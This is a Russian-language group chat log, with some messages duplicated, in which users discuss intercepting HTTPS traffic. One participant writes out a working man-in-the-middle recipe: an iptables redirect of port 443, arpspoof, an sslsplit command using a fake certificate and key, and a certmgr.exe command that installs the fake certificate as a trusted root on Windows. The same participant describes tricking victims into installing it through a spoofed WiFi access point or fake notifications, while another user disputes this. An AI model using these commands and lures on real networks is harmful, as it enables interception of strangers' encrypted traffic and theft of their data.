a
Добро пожаловать Hagzer Colaro. Не ответив на вопрос, будешь удалён из чата
Size: a a a
2021 October 02
d
так сертификат ещё как-то подменить надо в хранилище юзера... точнее добавить свой
E
перенаправление трафика + sslsplit
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
(arpspoof)
sslsplit -D -l connections.log -L data.log -c fake_cert.crt -k fake_key.key ssl 0.0.0.0 8443
Перед этим подписать сертификат, чтобы у юзера открывались сайты: (для Windows) certmgr.exe -add -c fake_cert.crt -s -r localMachine root
И насчёт импортирования, кстати, сейчас каждый юзер когда заходит на сайт - автоматически кликает "скачать сертификат". Не сложно подменить сайт, и заставить его скачать твой сертификат. В конце концов, можно подменить WiFi, и там перенаправлять на свой сайт с просьбой скачать сертификат
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443
(arpspoof)
sslsplit -D -l connections.log -L data.log -c fake_cert.crt -k fake_key.key ssl 0.0.0.0 8443
Перед этим подписать сертификат, чтобы у юзера открывались сайты: (для Windows) certmgr.exe -add -c fake_cert.crt -s -r localMachine root
И насчёт импортирования, кстати, сейчас каждый юзер когда заходит на сайт - автоматически кликает "скачать сертификат". Не сложно подменить сайт, и заставить его скачать твой сертификат. В конце концов, можно подменить WiFi, и там перенаправлять на свой сайт с просьбой скачать сертификат
d
где ты видел нечто просящее скачать сертификат? ни разу не встречал...
d
просьбы скачать сертификат, это уже тревожный звоночек, надо сразу закрывать страницу
E
Ну на смартфонах, как минимум, постоянно вижу. Как захожу на сайт - просят добавить сертификат.
И друзья у меня постоянно тыкают "добавить"
И друзья у меня постоянно тыкают "добавить"
d
ты где живёшь? в какой стране, смысле
E
А это тут причём?
Да и вообще, тут дело в социальной инженерии. Заставить сертификат скачать несложно
Хотя мне и для анализа HTTPS траффика хватает sslstrip
Да и вообще, тут дело в социальной инженерии. Заставить сертификат скачать несложно
Хотя мне и для анализа HTTPS траффика хватает sslstrip
E
Да, уведомления
Иногда ещё на рекламных сайтах делают фейк-уведомление. Срабатывает в большинстве
Иногда ещё на рекламных сайтах делают фейк-уведомление. Срабатывает в большинстве
d
затем, что я ни разу не натыкался на подобное, никогда ничего не просило
d
и они именно об установке сертификата?
E
Просто на сайты мало заходишь))
d
а нечего по сомнительным местам лазать
楽
На чём прогаешь?
E
А кто сказал "лазить"
Просто такая техника существует. Тебя никто спрашивать не будет, когда весь твой траффик будут перенаправлять на точку доступа с сайтом злоумышленника, и просить таки установить сертификат, а никуда ты больше и не зайдёшь
Просто такая техника существует. Тебя никто спрашивать не будет, когда весь твой траффик будут перенаправлять на точку доступа с сайтом злоумышленника, и просить таки установить сертификат, а никуда ты больше и не зайдёшь